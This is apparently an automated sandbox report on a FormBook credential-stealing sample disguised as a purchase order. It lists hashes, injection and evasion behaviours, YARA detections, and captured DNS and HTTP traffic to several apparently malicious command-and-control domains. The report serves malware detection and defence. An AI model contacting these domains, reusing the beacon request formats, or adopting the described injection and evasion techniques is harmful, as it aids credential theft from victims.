Windows Analysis Report
Purchase Order..exe

Overview

General Information

Sample name: Purchase Order..exe
Analysis ID: 1567398
MD5: ecb3a0578fe97356ed12da57bc6bbc36
SHA1: 6dff87fc845846f7ea2a03d0b5eff42b8fbc9f86
SHA256: 469bf1df653a45070717d7c7121dfb3cdd3ccd150f3182ff399a012dc5c95de7
Tags: exe, user-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Purchase Order..exe (PID: 1160 cmdline: "C:\Users\user\Desktop\Purchase Order..exe" MD5: ECB3A0578FE97356ED12DA57BC6BBC36)
    • Purchase Order..exe (PID: 3276 cmdline: "C:\Users\user\Desktop\Purchase Order..exe" MD5: ECB3A0578FE97356ED12DA57BC6BBC36)
      • jfBrBcvTIMPfDU.exe (PID: 5568 cmdline: "C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 5832 cmdline: "C:\Windows\SysWOW64\isoburn.exe" MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • jfBrBcvTIMPfDU.exe (PID: 516 cmdline: "C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4936 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.2659993689.0000000000A80000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.1836694214.0000000001B80000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.2659764496.00000000009E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.Purchase Order..exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.Purchase Order..exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched
No Suricata rule has matched

                AV Detection

                Source: Purchase Order..exeReversingLabs: Detection: 55%
                Source: Yara matchFile source: 3.2.Purchase Order..exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.Purchase Order..exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2659993689.0000000000A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1836694214.0000000001B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2659764496.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1836855226.0000000003140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Purchase Order..exeJoe Sandbox ML: detected
                Source: Purchase Order..exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Purchase Order..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: isoburn.pdb source: Purchase Order..exe, 00000003.00000002.1835092143.0000000001278000.00000004.00000020.00020000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000002.2660645689.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: Purchase Order..exe, 00000003.00000002.1835092143.0000000001278000.00000004.00000020.00020000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000002.2660645689.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jfBrBcvTIMPfDU.exe, 00000005.00000000.1754034145.0000000000C1E000.00000002.00000001.01000000.0000000C.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000000.1907095632.0000000000C1E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Purchase Order..exe, 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1837480994.00000000046CE000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1835190405.0000000004515000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Purchase Order..exe, Purchase Order..exe, 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1837480994.00000000046CE000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1835190405.0000000004515000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0070C4E0 FindFirstFileW,FindNextFileW,FindClose,6_2_0070C4E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then xor eax, eax6_2_006F9E40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then mov ebx, 00000004h6_2_046904F8

                Networking

                Source: DNS query: www.cyperla.xyz
                Source: Joe Sandbox ViewIP Address: 188.114.96.6 188.114.96.6
                Source: Joe Sandbox ViewIP Address: 103.224.182.242 103.224.182.242
                Source: Joe Sandbox ViewASN Name: BETAINTERNATIONALTR BETAINTERNATIONALTR
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:27:04 GMTserver: Apacheset-cookie: __tad=1733232424.2662998; expires=Fri, 01-Dec-2034 13:27:04 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:27:07 GMTserver: Apacheset-cookie: __tad=1733232427.8390935; expires=Fri, 01-Dec-2034 13:27:07 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:27:10 GMTserver: Apacheset-cookie: __tad=1733232430.2077707; expires=Fri, 01-Dec-2034 13:27:10 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: GET /qygv/?MVWd=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WmoCRaQ8OoRB1M8xsODg9Mufe/exe8zzsMcFcs0FiYc3z1g==&kfm=dFj0Olb HTTP/1.1Host: www.cyperla.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qx5d/?MVWd=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPvvTYRvxaqp7vn6p2LTuI6fSpdFMX3ZLUkPs/SWb4JECmGQ==&kfm=dFj0Olb HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5Q/485VI7OI/8adtFmnjL5G+X4c0GC9YevItAMgBvFKG4A==&kfm=dFj0Olb HTTP/1.1Host: www.madhf.techAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /v89f/?MVWd=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k2NYglVjUbXXrY07zMLLi7rmhcEJnvkrNOok7dcSq1J6Z3g==&kfm=dFj0Olb HTTP/1.1Host: www.bser101pp.buzzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.cyperla.xyz
                Source: global trafficDNS traffic detected: DNS query: www.cstrategy.online
                Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                Source: global trafficDNS traffic detected: DNS query: www.bser101pp.buzz
                Source: global trafficDNS traffic detected: DNS query: www.goldstarfootwear.shop
                Source: unknownHTTP traffic detected: POST /qx5d/ HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.cstrategy.onlineContent-Length: 205Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.cstrategy.online/qx5d/User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 03 Dec 2024 13:26:31 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:27:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nzkmMgX7hAH%2Bm97loqvHeP1p7yz8GLRvkDCNE05aZQTHntbGzyR%2BESEFFyaFuZZfjTV6d6lf6zECd4zGLpL7JWr6h0XtSLMaZLDqa8tRB5R5G6aGENbEQsktyVynRToLzbu0BQ4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3e4baff950f85-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1681&rtt_var=840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=631&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:27:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DNkww1UWROTOo%2Blk68FSR2qThOGbuDk3tnMRoTBKFOaWoUavcohUuXGztV3L3iD%2BUCZGOLEAnJPRrEzTKTPX%2BbfMiNkN1yuZ2sYsuak2ZU%2FnZN%2Fd8Dp7ob2ZxhZLH74DkE7Gb6s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3e4cb4f618cba-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1830&rtt_var=915&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=651&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:27:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XCy3YQYA1lfXqxnAMS6BJLEGhc3jGG9HfPFvCd36ZKeHtkpuZtjhxdcDDkztvLEZD6r5V76EqbhNjtqfFMJgth2dkOG%2B479QCq2ZDYiI4YKve14s%2BVDgul%2FMlyyeY7eche%2FLiNs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3e4dc9e8842b2-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1756&rtt_var=878&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1668&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:27:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rzkl7NWsk3UkFgzvkz7zTOa5hmLHq1FEv0tp1hnubdSblP2mwWu7%2BNXZ4Y%2BL019cEAmk84zMgcWIH1X31hOknhpCoGKlqloK40VblXVWemRygVvXV0bKPqpYcuQnYsei%2Fi4lMe8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3e4eea9a32363-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1749&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=367&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: isoburn.exe, 00000006.00000002.2663245910.0000000004EAC000.00000004.10000000.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2662205825.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2130259016.000000003C42C000.00000004.80000000.00040000.00000000.sdmp, Purchase Order..exe String found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: jfBrBcvTIMPfDU.exe, 00000009.00000002.2661409354.00000000027A5000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.goldstarfootwear.shop
                Source: jfBrBcvTIMPfDU.exe, 00000009.00000002.2661409354.00000000027A5000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.goldstarfootwear.shop/8m07/
                Source: jfBrBcvTIMPfDU.exe, 00000009.00000002.2662205825.0000000003418000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.madhf.tech/6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: isoburn.exe, 00000006.00000002.2660079922.0000000000B18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: isoburn.exe, 00000006.00000002.2660079922.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: isoburn.exe, 00000006.00000003.2019441917.0000000007BDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: isoburn.exe, 00000006.00000002.2660079922.0000000000B18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: isoburn.exe, 00000006.00000002.2660079922.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: isoburn.exe, 00000006.00000002.2660079922.0000000000B18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: isoburn.exe, 00000006.00000003.2020891893.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2660079922.0000000000B18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: isoburn.exe, 00000006.00000002.2663245910.0000000005426000.00000004.10000000.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2662205825.0000000003286000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.cstrategy.online/qx5d/?MVWd=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                Source: isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                Source: Yara match File source: 3.2.Purchase Order..exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 3.2.Purchase Order..exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.2659993689.0000000000A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.1836694214.0000000001B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.2659764496.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.1836855226.0000000003140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample Static PE information: Filename: Purchase Order..exe
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_0042C663 NtClose,3_2_0042C663
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2B60 NtClose,LdrInitializeThunk,3_2_018A2B60
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_018A2DF0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_018A2C70
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A35C0 NtCreateMutant,LdrInitializeThunk,3_2_018A35C0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A4340 NtSetContextThread,3_2_018A4340
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A4650 NtSuspendThread,3_2_018A4650
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2B80 NtQueryInformationFile,3_2_018A2B80
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2BA0 NtEnumerateValueKey,3_2_018A2BA0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2BE0 NtQueryValueKey,3_2_018A2BE0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2BF0 NtAllocateVirtualMemory,3_2_018A2BF0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2AB0 NtWaitForSingleObject,3_2_018A2AB0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2AD0 NtReadFile,3_2_018A2AD0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2AF0 NtWriteFile,3_2_018A2AF0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2DB0 NtEnumerateKey,3_2_018A2DB0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2DD0 NtDelayExecution,3_2_018A2DD0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2D00 NtSetInformationFile,3_2_018A2D00
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2D10 NtMapViewOfSection,3_2_018A2D10
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2D30 NtUnmapViewOfSection,3_2_018A2D30
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2CA0 NtQueryInformationToken,3_2_018A2CA0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2CC0 NtQueryVirtualMemory,3_2_018A2CC0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2CF0 NtOpenProcess,3_2_018A2CF0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2C00 NtQueryInformationProcess,3_2_018A2C00
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2C60 NtCreateKey,3_2_018A2C60
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2F90 NtProtectVirtualMemory,3_2_018A2F90
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2FA0 NtQuerySection,3_2_018A2FA0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2FB0 NtResumeThread,3_2_018A2FB0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2FE0 NtCreateFile,3_2_018A2FE0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2F30 NtCreateSection,3_2_018A2F30
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2F60 NtCreateProcessEx,3_2_018A2F60
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2E80 NtReadVirtualMemory,3_2_018A2E80
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2EA0 NtAdjustPrivilegesToken,3_2_018A2EA0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2EE0 NtQueueApcThread,3_2_018A2EE0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A2E30 NtWriteVirtualMemory,3_2_018A2E30
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A3090 NtSetValueKey,3_2_018A3090
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A3010 NtOpenDirectoryObject,3_2_018A3010
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A39B0 NtGetContextThread,3_2_018A39B0
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A3D10 NtOpenProcessToken,3_2_018A3D10
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A3D70 NtOpenThread,3_2_018A3D70
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F4650 NtSuspendThread,LdrInitializeThunk,6_2_048F4650
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F4340 NtSetContextThread,LdrInitializeThunk,6_2_048F4340
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_048F2CA0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2C60 NtCreateKey,LdrInitializeThunk,6_2_048F2C60
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_048F2C70
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2DD0 NtDelayExecution,LdrInitializeThunk,6_2_048F2DD0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_048F2DF0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_048F2D10
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_048F2D30
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_048F2E80
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_048F2EE0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2FB0 NtResumeThread,LdrInitializeThunk,6_2_048F2FB0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2FE0 NtCreateFile,LdrInitializeThunk,6_2_048F2FE0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2F30 NtCreateSection,LdrInitializeThunk,6_2_048F2F30
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2AD0 NtReadFile,LdrInitializeThunk,6_2_048F2AD0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2AF0 NtWriteFile,LdrInitializeThunk,6_2_048F2AF0
